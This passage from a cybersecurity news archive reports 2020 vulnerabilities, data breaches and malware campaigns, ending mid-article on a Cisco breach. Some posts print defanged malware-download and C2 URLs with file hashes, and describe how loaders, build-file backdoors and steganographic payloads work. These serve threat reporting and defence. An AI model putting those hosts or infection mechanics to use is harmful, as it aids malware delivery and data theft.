Category Archives: Pierluigi Paganini

VMware addresses Fusion flaw introduced in the attempt to fix CVE-2020-3950 issue

VMware has released an update to address a privilege escalation flaw in VMware for the macOS version of Fusion that was introduced by a previous patch.

In March, VMware patched a high-severity privilege escalation vulnerability (CVE-2020-3950) in Fusion, Remote Console (VMRC) and Horizon Client for Mac.

The CVE-2020-3950 is a privilege escalation vulnerability caused by the improper use of setuid binaries, it could be exploited by attackers to escalate privileges to root.

The flaw was reported by Jeffball of GRIMM and Rich Mirch, VMware assigned it a CVSSv3 base score of 7.3 and rated it as Important severity. The issue impacts Fusion (11.x before 11.5.2), Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) macOS apps.

Mirch and Jeffball, immediately noted that the patch issued by VMware was incomplete, VMware confirmed it a few days later and released a new patch at the end of March. Unfortunately the new fix introduced a new security issue.

The vulnerability introduced by the second patch, tracked as CVE-2020-3957, is a time-of-check time-of-use (TOCTOU) issue that could allow attackers with low permissions to execute arbitrary code with root privileges.

Last week, the company releases version 11.5.5, but the issue for VMRC and Horizon Client for Mac are yet to be approved.

Pierluigi Paganini

(SecurityAffairs – Fusion, cybersecurity)

The post VMware addresses Fusion flaw introduced in the attempt to fix CVE-2020-3950 issue appeared first on Security Affairs.

The team behind the Joomla CMS discloses a data breach

Maintainers at the Joomla open-source content management system (CMS) announced a security breach that took place last week.

Last week a member of the Joomla Resources Directory (JRD) team left an unencrypted full backup of the JRD site (resources.joomla.org) on an unsecured Amazon Web Services S3 bucket operated by the company.

The company did not reveal is third-parties have found and accessed to the S3 bucket.

“JRD full site backups (unencrypted) were stored in a third-party company Amazon Web Services S3 bucket. The third-party company is owned by a former Team Leader, still Member of the JRD team at the time of the breach.” reads the data breach notification. “Known to the current Team Leader at the time of the breach. (https://volunteers.joomla.org/teams/resource-directory-team) Each backup copy included a full copy of the website, including all the data.”

The backup contained details for approximatively 2,700 users who registered and created profiles on the JRD website.

The Joomla Resources Directory portal allows professionals and developers to advertise their services.

Joomla team is investigating the data leak said they are still investigating the incident. It is currently unclear if anyone found and download the data from the third-party company’s S3 server.

The Joomla team also carried out a full security audit of the portal.

“The audit also highlighted the presence of Super User accounts owned by individuals outside Open Source Matters,” continues the notification.

Data contained in the backup includes :

  • Full name
  • Business address
  • Business email address
  • Business phone number
  • Company URL
  • Nature of business
  • Encrypted password (hashed)
  • IP address
  • Newsletter subscription preferences

The data breach notification states that most of the data was public, because it was a public directory, anyway private data (unpublished, unapproved listings, tickets) was exposed in the breach.

The Joomla team is urging JRD users to change their password on the JRD portal and on other sites where they share the login credentials.

“Even if we don’t have any evidence about data access, we highly recommend people who have an account on the Joomla Resources Directory and use the same password (or combination of email address and password) on other services to immediately change their password for security reasons.” concludes the notification.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post The team behind the Joomla CMS discloses a data breach appeared first on Security Affairs.

KingNull leaks DB of Daniel’s Hosting dark web hosting provider

Earlier this year a hacker breached Daniel’s Hosting, the largest free web hosting provider for dark web hidden services and now leaked its DB.

A threat actor has leaked the database of Daniel’s Hosting (DH), the largest free web hosting provider for dark web hidden services.

The hacker has stolen the data in March when he breached the hosting provider, almost 7,600 dark web portals have been taken offline following the security breach.

Daniel Winzen, a German software developer that operated the service, revealed that attackers accessed the backend of the hosting provider and deleted all the databases of the websites hosted by Daniel’s Hosting.

Winzen definitively shut down the service on March 26.

Today ZDNet reported that a hacker that goes online with the moniker ‘KingNull’ uploaded a copy of Daniel’s Hosting database on a file-hosting site.

“According to a cursory analysis of today’s data dump, the leaked data includes 3,671 email addresses, 7,205 account passwords, and 8,580 private keys for .onion (dark web) domains.” reported ZDNet.

Threat intelligence firm Under the Breach that analyzed the leaked database told ZDNet that the archive includes sensitive information on the owners and users of thousands of darknet sites. IP addresses of administrators and users were not included in the archive.

The database could allow law enforcement agencies to deanonymize administrators of dark web services that were involved in illegal activities.

Unfortunately, the leak could put in danger activists and dissidents that use the darknets to avoid the censorship applied by regimes.

In November 2018, Daniel’s Hosting provider was victims of another incident, attackers hacked the service and deleted 6,500+ sites.

ZDNet revealed that Winzen plans to launch again the hosting service in several months.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post KingNull leaks DB of Daniel’s Hosting dark web hosting provider appeared first on Security Affairs.

Anonymous demands justice for George Floyd and threatens attacks

The hacktivist collective group Anonymous demands justice for George Floyd and threatens to ‘expose the many crimes’ of Minneapolis Police.

Anonymous demands justice for George Floyd and threatens to ‘expose the many crimes’ of Minneapolis Police. George Floyd was killed by a white police officer by kneeling on his neck for more than eight minutes.

While widespread civil unrest escalated in the US and the protest against the brutality of the police is spreading in the principal cities, Anonymous released a video, threatening Minneapolis Police Department (MPD) that it will “expose your many crimes to the world.”

The video was shared on May 28 through a Facebook page affiliated with the group, the electronic voice accuses MPD of having “a horrific track record of violence and corruption,” claiming that the killing of George Floyd was “merely the tip of the iceberg.”

“Officers who kill people and commit other crimes need to be held accountable just like the rest of us. Otherwise, they will believe that they have a license to do whatever they want.” the Anonymous narrator says.

“People have had enough of this corruption and violence from an organization that promises to keep them safe. After the events of the past few years, many people are beginning to learn that you are not here to save us but rather you are here to oppress us and carry out the will of the criminal ruling class.”

“You are here to keep order for the people in control, not to provide safety for the people who are controlled. In fact, you are the very mechanism that elites use to continue their global system of oppression.”

“These officers must face criminal charges and officer Chauvin especially should face murder charges. Unfortunately, we do not trust your corrupt organization to carry out justice so will be exposing your many crimes to the world. We are legion. Expect us.”

“Sadly, in the vast majority of police killings, the only one left alive to tell the story is the officer who took the person’s life,” the Anonymous narrator continues. “This travesty has gone on for far too long… and now the people have had enough.”

The collective has launched its offensive against the authorities, the MPD’s website was taken offline late on Saturday, and today alleged members of the group (@PowerfulArmyGR, @namatikure) announced on Pastebin that the site was hacked and leaked the database of email and passwords.

“The Minneapolis official website was been hacked and database with emails and passwords leaked.” reads the post published on PasteBin.

Anonymous has yet to claim responsibility for taking down the website.

In the last hours other operations have been attributed to Anonymous, including the hack of Chicago police radios,

Pierluigi Paganini

(SecurityAffairs – George Floyd, Anonymous)

The post Anonymous demands justice for George Floyd and threatens attacks appeared first on Security Affairs.

ENISA published “Proactive detection – Measures and information sources” report

EU Agency for Cybersecurity ENISA has published a new report of the proactive detection of incidents, including measures and information sources.

The EU Agency for Cybersecurity ENISA has published a new report and accompanying repository on measures and information sources that could help security experts and operators of IT and critical infrastructure to proactively detect network security incidents in the EU.

The documents aims at evaluating methods, tools, activities and information sources for proactive detection of network security incidents.

The proactive detection process aims at discovering malicious activity conducted by threat actors through internal monitoring tools or external sources that shares information about detected incidents.

“The current project aims to provide a complete inventory of all available methods, tools, activities and information sources for proactive detection of network security incidents, which are used already or potentially could be used by incident response teams in Europe nowadays.” reads the report. “The current report evaluates available methods, tools, activities and information sources for proactive detection of network incidents.”

ENISA proactive detection security incidents

The EU agency launched this project to improve the detection of network security incidents in the EU, by:

  • Providing an inventory of available measures and information sources;
  • Identifying good practices;
  • Recommending possible areas for development.

This report identifies and analyzes how proactive detection in the EU is evolved between 2011 and 2019. Among the goals of the project there is the exploration of new areas that could help to improve operational cooperation and information sharing.

The deliverable of the project are three reports and in a living repository hosted on GitHub.

“The objective is to offer a point of reference for new or well-established teams who need to identify or reassess appropriate measures for proactive detection of incidents.” continues the post published by ENISA.

1- Report – Survey results

  • Survey among incident response teams in Europe;
  • Comparison with the 2011 survey.

2- Report – Measures and information sources

  • Inventory of available methods, tools, activities and information sources;
  • Evaluation of identified measures and information sources.

3- Report – Good practices gap analysis recommendations

  • Analysis of the data gathered;
  • Recommendations.

4- Online repository – GitHub

  • Information sources;
  • Measures and tools.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – ENISA, cybersecurity)

The post ENISA published “Proactive detection – Measures and information sources” report appeared first on Security Affairs.

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

Over 100K+ WordPress sites using PageLayer plugin exposed to hack

Two security flaws in the PageLayer WordPress plugin can be exploited to potentially wipe the contents or take over WordPress sites.

Security experts from WordFence discovered two high severity security vulnerabilities in the PageLayer WordPress plugin that could potentially allow attackers to wipe the contents or take over WordPress sites using vulnerable plugin versions.

PageLayer is a WordPress page builder plugin, it is very easy to use and actually has over 200,000 active installations according to numbers available on its WordPress plugins repository entry.

The vulnerabilities were reported to PageLayer’s developer by the Wordfence Threat Intelligence team on April 30 and were patched with the release of version 1.1.2 on May 6.

One vulnerability could allow an authenticated user with subscriber-level and above permissions to update and modify posts.

“One flaw allowed any authenticated user with subscriber-level and above permissions the ability to update and modify posts with malicious content, amongst many other things,” reads the post published by Wordfence.

The second vulnerability could allow attackers to forge a request on behalf of a site’s administrator to change the plugin settings allowing to inject malicious Javascript.

Both vulnerabilities are the result of unprotected AJAX actions, nonce disclosure, and a lack of Cross-Site Request Forgery (CSRF) protection. An attacker could exploit the vulnerabilities to inject malicious JavaScript code, alter the pages of the site, create rogue admin accounts, redirect site visitors to malicious sites, and exploit a site’s user’s browser to compromise their computer.

WordFence experts reported the issue to PageLayer’s developers on April 30 and both were addressed with the release of version 1.1.2 on May 6.

Developers implemented permissions checks on all of the sensitive functions that could allow to change the site and reconfigured the plugin to create separate nonces for the public and administrative areas of a WordPress site.

At the time of writing, more than a hundred thousand WordPress sites still use vulnerable versions of PageLayer plugin.

When it comes to WordPress attacks involving the exploitation of vulnerabilities, malicious actors usually target unpatched plugins, for this reason, it is essential to keep them up to date.

I believe it is very important to protect WordPress install with dedicated solutions, I’m currently using WordFence solution, the company provided with a license to evaluate the premium features.

Pierluigi Paganini

(SecurityAffairs – PageLayer, hacking)

The post Over 100K+ WordPress sites using PageLayer plugin exposed to hack appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign that is targeting the users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site used (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new Phishing campaign against INPS users , similar to the previous one of April 6, 2020 , has been detected in the past few hours by our research and analysis center for Phishing campaigns.” reads the post published D3Lab.

“The fraudulent activity is carried out through a web domain created Ad Hoc with similarities, in the name, to the official one of the national social security institution with the intent to download malware to users interested in receiving the Covid-19 allowance allocated from the Italian state.”

COVID-19 campaign INPS
COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will give to some Italian citizens with specific requirements.

The citizens have to request the Covid-19 indemnity to the goverment through the INPS portal, for this reason, threat actors set up a fake INPS site asking people to download a phantom “application for the new COVID-19 indemnity” which actually returns a malicious APK for Android devices..

The malicious APT, named “acrobatreader.apk,” is a Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to take advantage of the legitimate functions of this service and achieve wider access to the system APIs to communicate with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to C2 through the following url ” http: // greedyduck [.] Top / gate [.] Php ” passing two parameters:

  • ” Action “: with botcheck or injcheck values ;
  • ” Data “: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

API Security and Hackers: What’s the Need?

API Security – There is a considerable demand for data-centric projects, that is why companies have quickly opened their data to their ecosystem through REST or SOAP APIs.

APIs work as doors for a company – closely guarding data of an organization. However, there are some challenges created: how do we hold the doors open to the world while simultaneously sealing them off from hackers?

Here are the simple tips for API security, let’s have a look! 

Authentication

Don’t communicate with strangers. To increase the complexity of hacking your device, always get to know who is calling your APIs, by using a simple access authentication (user/password) or an API key (asymmetric key).

Encryption 

Just be cryptic. For internal or external correspondence nothing should be in the open.

You and your partners can cipher all TLS (the successor to SSL) transfers, be it one-way encryption (also called standard one-way TLS) or even better, shared encryption (two-way TLS).

Using the new versions of TLS to block the use of weaker cipher suites.

Monitoring: Audit, Log, and Version 

In case of an error, you need to be ready to troubleshoot: audit and log relevant information on the server. Also, keep that history as long as it is reasonable in terms of capacity for your servers in production. In case of any accidents, you can convert your logs into debugging tools. Follow-up dashboards are also highly recommended resources for monitoring your API use.

Do not forget to add the version to all APIs, ideally in the API direction, to give several APIs with different versions working concurrently, and to be able to delete and depreciate one version over another.

Call Security Experts

It is better to use ICAP (Internet Content Adaptation Protocol) servers or excellent Antivirus systems to protect the data of your company. 

Share as Little as Possible 

For API security, it’s okay to be paranoid and show very little information, particularly in error messages. Limit content and email subjects to predefined messages that are non-customizable. Since you can send locations to IP addresses, keep them for yourself. To limit access to your accounts, use IP Whitelist and IP Blacklist where possible. You can also check your ip address by simply searching what is my ip and you will get the details. Limit the number of administrators, divide access into diverse roles, and hide sensitive information in all your interfaces. 

OAuth & OpenID Connect 

Delegate all responsibilities. A good manager takes accountability, and a fantastic API does so too. The authorization and/or authentication of your APIs should be delegated.

OAuth is a magical mechanism which prevents you from having to remember 10,000 passwords. Instead of creating an account on a website, you can connect via credentials from another provider, such as Facebook or Google. This works the same way for APIs: the API provider depends on a third-party server to handle permissions. The user does not supply their credentials but then gives the third-party server a token. This protects the user because they don’t reveal their passwords, and the provider of the API doesn’t need to worry about protecting data about the authorization, because it only collects tokens.

OAuth is a delegation protocol widely used to forward authorizations. You can add an identity layer on top of it to protect your APIs even further and add authentication: this is the Open I d Connect standard which extends OAuth 2.0 with ID tokens.

System Protection with Throttling and Quotas 

Keep a Control. To protect your backend network bandwidth according to the capability of your servers, you can restrict access to your device to a limited number of messages per second.

You can also limit access by the API and the user (or application) to make sure that no one, in particular, can misuse the program or any API.

Throttling thresholds and quotas – if well defined – are essential to avoid attacks from different sources from overwhelming the network with numerous requests (DDOS-Distributed Denial of Service Attack).

OWASP top 10

Avoid wasps. The top 10 of the OWASP (Open Web Application Security Project) is a list of the ten worst vulnerabilities, measured by their exploitability and effect. In addition to the above, make sure that you have checked all of the bugs in OWASP to check the program.

Data Validation 

Be picky and refuse surprise presents, especially when they’re massive. You should verify that your server is accepting anything. Be vigilant to reject any content that is added, data that is too high, and also test the information that customers give you. Use XML or JSON schema validation to verify whether your restrictions are what they should be (integer, string …) to avoid all kinds of XML blast and SOL injection. 

Infrastructure 

Stay up-to-date. To be stable and still benefit from the latest security updates, a good API should rely on a good security network, infrastructure and up-to-date applications (servers, load balancers).

API Firewalling 

Create a wall: Building of a wall will solve all the immigration issues for some citizens. That is the case, at least for APIs! The protection of your API should be divided into two levels:

  • DMZ is the first level, with an API firewall to perform simple protection measures, including checking message size, SQL injections, and any HTTP layer-based protection that blocks intruders early. The message is then forwarded to the second sheet.
  • The second level is LAN, with advanced data information protection mechanisms.

Set a Budget for Security Testing 

Security monitoring takes time and resources, and the investment needs to be made by the businesses. Although new functionality drives growth, security testing should be allocated about 5 percent to 10 percent of the budget. Use of APIs is growing and encouraging companies to create more diverse applications. Nonetheless, as they exploit these resources, companies need to be mindful of and close the possible security holes.

About the author: Waqas Baig

Waqas Baig is a Tech Writer having experience of 8 years in journalism, reporting and editing. In his spare time, he reads and writes about tech products including gadgets, smart watches, home security products and others. If you have story ideas, feel free to share here waqasbaigblog@gmail.com

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post API Security and Hackers: What’s the Need? appeared first on Security Affairs.

ICT solutions provider NTT Com discloses security breach

NTT Communications (NTT Com), a subsidiary of tech giant NTT Corp, disclosed a data breach that impacted hundreds of customers.

NTT Communications (NTT Com), a subsidiary of the tech giant NTT Corp, disclosed a data breach that impacted hundreds of customers.

NTT Com provides network management, security and solution services[3] to consumers, corporations and governments.

NTT Com Group has more than 30 companies in the Asia-Pacific regionEurope and the Americas.

The company launched an investigation after discovering unauthorized access to some systems on May 7, then this week it confirmed that threat actors may have been stolen.

“NTT Communications (hereafter NTT Com) detected an unauthorized access to our equipment that has been made by an attacker on May 7, and the possibility that some information may have leaked to the outside was confirmed on May 11.” reads the data breach notification.

Experts at NTT Com initially noticed suspicious activity on an Active Directory server, then they discovered that threat actors have breached an operational server and an information management server that stored customer information.

The internal investigation revealed that attackers initially targeted a server in Singapore, then used it for lateral movements and reach the infrastructure in Japan.

In response to the incident, the company shut down impacted servers to avoid the malware from spreading and communicating with external servers.

According to NTT, the security breach could impact 621 companies whose information was stored on the information management server.

The company announced that it has taken additional measures to prevent similar attacks in the future.

Other major Japanese companies recently disclosed security breaches, some of them took place years ago, including NEC, Mitsubishi ElectricPasco and Kobe Steel.

Pierluigi Paganini

(SecurityAffairs – NTT, hacking)

The post ICT solutions provider NTT Com discloses security breach appeared first on Security Affairs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

Introduction

During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed to many companies under our protective umbrella. These messages were leveraging FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemics. These emails were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.  

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware code into the victim’s machine. Sometimes, a loader can assume “stealer” behavior, to opportunistically gatherer sensitive information even if they are not supposed to do that. Absent-Loader does that and despite its name behaves this way. In fact, stolen information market is definitely remunerative for cyber criminals: information gathered from infected systems are constantly sell in the underground, typically acquired by other, more structured criminal organization or also by business competitors.

Technical Analysis  

The sample used in this campaign first uses word document which refers to an executable, then it drops another executable and does a renaming operations to evade controls. The following picture reports the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. Following, the static information of this file:

NameCovid-19-PESANTATION.doc
Hash97FA1F66BD2B2F8A34AAFE5A374996F8
ThreatHimera Loader dropper
Size95,4 KB (97.745 byte)
FiletypeMicrosoft Word document 
Ssdeep1536:7fVmPSiRO8cOV8xCcoHrZvIdTZ2DSXMqcI3iL5PEs8VlbeH0btGDYLlNq2l+SEg:7fVz8zyUHlvId7H3iL5MVlbeHGkQvqTU

Table 1: Static information about the Malicious document

The interesting feature of this document is the fact that it does not leverage any type of macro or exploit, but it contains the entire executable within it as an embedded object. So, the user is led to double-click on the malicious icon, representing the executable. 

Thus, once clicked, it allows this malicious document to execute a malicious file named HimeraLoader.exe.

NameHimeraLoader.exe
Hash4620C79333CE19E62EFD2ADC5173B99A
ThreatSecond stage dropper
Size143 KB (146.944 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep3072:jqW9iAayyenylzx0/2gJUSUZsnOA/TtYLeEoWj5PxJhQQeSH1pNGmHohurCMSiBf:jqW9iAayyenylzx0/2gJUSUZsnJ/TKLd

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe trace we noticed a really characteristic mutex created during the initial loading of the malicious code: the “HimeraLoader v1.6” mutex, or Mutant.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows API such as “IsDebbugerPresent”, “IsProcessorFeaturePresent” and “GetStartupInfoW”. The execution will take different paths in the program’s flow if the debugger is present. The function GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created. This function takes as parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

When the Himera Loader goes through its execution and passes all anti-analysis tricks, it gathers another binary from http:]//195.]2.]92.]151/ad/da/drop/smss.]exe . The remote server is operated by Hosting Technologies LLC, a company running the Russian hosting service brand “VDSina.ru”. 

The AbSent-Loader 

The file downloaded from the dropurl has the following static information:

Namesmss[1].exe
Hash4D2207059FE853399C8F2140E63C58E3
ThreatDropper/Injector
Size0,99 MB (1.047.040 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep24576:+9d+UObalbls+rcaN+cFsyQIDHx2JrjDwc9bmfRiHwl:+9d+UObaVzrcaN+cKypDHx2Jr/wYbmJd

Table 3: Static information about the AbsentLoader Payload

When “smms.exe” is executed, it copies itself in a new file winsvchost.exe in the %TEMP% path and creates a scheduled task to maintain persistence after reboot.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, like the GetTickcount one. The technique is quite similar to that one described in one of our previous report. there is immediately the subtraction of the two values and it is placed in EAX register. After the “call eax” instruction, an immediate subtraction of the first GetTickCount  API call results and this second one is executed. 

Figure 6: GetTickCount anti-debug Technique

Then, the malware establishes TCP connection every 15 minutes. These connections are directed to the same remote host operated by Hosting Technologies LLC  (195.2.92.151) but this time it sends HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, behaves also like a bot, lacking most modern advanced features but sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow up malware implants. 

Conclusion

The attack we intercepted and described here is a clear example of the new threats that are approaching cyberspace during these months: new criminal threat actors with the sole objective to economically exploit the emotional reactions of the people willing to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is getting more and more risky for companies and people, the cyber criminality raised during the lock-downs and these malicious actors are using all the possible mediums to make more money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub

GitHub has issued a security alert warning of a malware campaign that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub has issued a security alert warning of a piece of malware dubbed Octopus Scanner that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub’s security team discovered the malicious code in projects managed using the Apache NetBeans IDE (integrated development environment), a complete environment composed of editors, wizards, and templates that help users to create applications in Java, PHP and many other languages. t

On March 9, a security researcher informed GitHub about a set of GitHub-hosted repositories that were actively serving malware. The company immediately investigated the incident and discovered malware designed to enumerate and backdoor NetBeans projects, “and which uses the build process and its resulting artifacts to spread itself.”

What makes this case different from previous abuses of the platforms is that the owners of the repositories were aware that they were committing backdoored code into their repositories.

GitHub’s Security Incident Response Team (SIRT) received its initial notification about a set of repositories serving malware-infected open source projects from security researcher JJ.” reads a post published by Github.

“this report was different. The owners of the repositories were completely unaware that they were committing backdoored code into their repositories.”

The Octopus Scanner identifies the NetBeans project files and embeds malicious payload both in project files and build JAR files.

Below is a high -evel description of the Octopus Scanner activity:

  • Identify user’s NetBeans directory
  • Enumerate all projects in the NetBeans directory
  • Copy malicious payload cache.dat to nbproject/cache.dat
  • Modify the nbproject/build-impl.xml file to make sure the malicious payload is executed every time NetBeans project is build
  • If the malicious payload is an instance of the Octopus Scanner itself the newly built JAR file is also infected.
Netbeans octopus-supply chain attack

Experts uncovered 26 open source projects that were backdoored by the Octopus Scanner malware and that were serving backdoored code.

The Octopus Scanner campaign is not recent, it has been going on for years. Experts reported that the oldest sample of the malware was uploaded on the VirusTotal in August 2018.

Upon downloading any of the 26 projects, the malware would infect users’ local computers. The malware scans the victim’s workstation for a local NetBeans IDE install, and attempt to backdoor other developer’s Java projects.

According to the experts, Octopus Scanner is a multiplatform malware, it runs on Windows, macOS, and Linux and downloads a remote access trojan (RAT).

“However, if it was found, the malware would proceed to backdoor NetBeans project builds through the following mechanisms:

  1. It makes sure that every time a project was built, any resulting JAR files got infected with a so-called dropper. A dropper is a mechanism that “drops” something to the filesystem to execute. When executed, the dropper payload ensured local system persistence and would subsequently spawn a Remote Administration Tool (RAT), which connects to a set of C2 servers.
  2. It tries to prevent any NEW project builds from replacing the infected one, to ensure that its malicious build artifacts remained in place.”

The ultimate goal of the campaign is to deliver the RAT on the machines of developers working on sensitive projects to steal sensitive information.

“It was interesting that this malware attacked the NetBeans build process specifically since it is not the most common Java IDE in use today,” GitHub concludes.

“If malware developers took the time to implement this malware specifically for NetBeans, it means that it could either be a targeted attack, or they may already have implemented the malware for build systems such as Make, MsBuild, Gradle and others as well and it may be spreading unnoticed,”

“While infecting build processes is certainly not a new idea, seeing it actively deployed and used in the wild is certainly a disturbing trend.”

Pierluigi Paganini

(SecurityAffairs – NetBeans, hacking)

The post Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub appeared first on Security Affairs.

An archive with 20 Million Taiwanese’ citizens leaked in the dark web

Security experts from Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

A few weeks ago, threat intelligence firm Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

According to the experts, the leak includes government data of an entire country, it was leaked online by a reputable actor that goes online with moniker ‘Toogod.”

“A few weeks ago, our researchers came across a leaked database on the darkweb where a known and reputable actor ‘Toogod” dropped the database of “Taiwan Whole Country Home Registry DB” comprising of 20 Million+ records.” reads a post published by Cyble.

The database size is 3.5 GB, exposed data includes full name, full address, ID, gender, date of birth, and other info.

Taiwanese government data leak

The seller claims the database dates back as 2019, but Cyble researchers noted the last DOB record was from 2008. The database contains certain records with ‘NULL/empty’ DoB records, making it impossible to determine how recent the dump is.

Experts are still investigating the leak and will provide an update as soon as possible.

Cyble researchers have acquired the leak and will add soon its data to its AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Taiwanese database, dark web)

The post An archive with 20 Million Taiwanese’ citizens leaked in the dark web appeared first on Security Affairs.

Steganography in targeted attacks on industrial enterprises in Japan and Europe

Threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks, Kaspersky reported.

Researchers from Kaspersky’s ICS CERT unit reported that threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks.

The experts first observed the attacks in early 2020, while in early May, threat actors targeted organizations in Japan, Italy, Germany and the UK.

Hackers targeted suppliers of equipment and software for industrial enterprises with spear-phishing messages using malicious Microsoft Office documents. Attackers used PowerShell scripts, as well as various techniques to evade the detection and avoid the analysis of the malware.

“Phishing emails, used as the initial attack vector, were tailored and customized under the specific language for each specific victim. The malware used in this attack performed destructive activity only if the operating system had a localization that matched the language used in the phishing email.” reads the report published by Kaspersky. “For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese. “

The phishing messages are crafted to trick victims into opening the attached document and enable the macros. The emails are written in the target’s language, and the malware only starts if the operating system language on the machine matches the language in the phishing email.

Hackers used the Mimikatz tool to steal the authentication data of Windows accounts stored on a compromised system. At the time, the final goal of the threat actors is still unknown.

Kaspersky experts only observed malicious activity on IT systems, OT networks were not impacted in the attacks.

Upon executing the macro script contained in the bait document, a PowerShell script is decrypted and executed. This script downloads an image from image hosting services such as Imgur or imgbox, experts noticed that the URL of the image is randomly selected from a list.

The image contains data that is extracted by the malware to create another PowerShell script, which in turn creates another PowerShell script that is an obfuscated version of Mimikatz post-exploitation tool.

“The data is hidden in the image using steganographic techniques and is extracted by the malware from pixels defined by the algorithm. Using steganography enables the attackers to evade some security tools, including network traffic scanners.” continues the analysis.

“The data extracted from the image is consecutively encoded using the Base64 algorithm, encrypted with the RSA algorithm and encoded using Base64 again. Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key.”

Attackers also used an exception message as the decryption key for a malicious payload, also in this case the technique aims at evade the detection.

Kaspersky confirmed that its solutions have blocked all the attacks it has detected.

“This attack has caught the attention of researchers because the attackers use several unconventional technical solutions.” concludes Kaspersky.

“The use of the above techniques, combined with the pinpoint nature of the infections, indicates that these were targeted attacks. It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”

Pierluigi Paganini

(SecurityAffairs – industrial supplier attack, hacking)

The post Steganography in targeted attacks on industrial enterprises in Japan and Europe appeared first on Security Affairs.

Security breach impacted Cisco VIRL-PE infrastructure

Cisco discloses security breach that impacted VIRL-PE infrastructure, threat actors exploited SaltStack vulnerabilities to hack six company servers.

Cisco has disclosed a security incident that impacted part of its VIRL-PE infrastructure, threat actors exploited vulnerabilities in the SaltStack software package to breach six company servers.

These issues affect the following Cisco products running a vulnerable software release:

  • Cisco Modeling Labs Corporate Edition (CML)
  • Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)

Cisco’s advisory states that the SaltStack software package is bundled with some Cisco products, hackers exploited SaltStack issues to compromise six company servers:

  • us-1.virl.info
  • us-2.virl.info
  • us-3.virl.info
  • us-4.virl.info
  • vsm-us-1.virl.info
  • vsm-us-2.virl.info

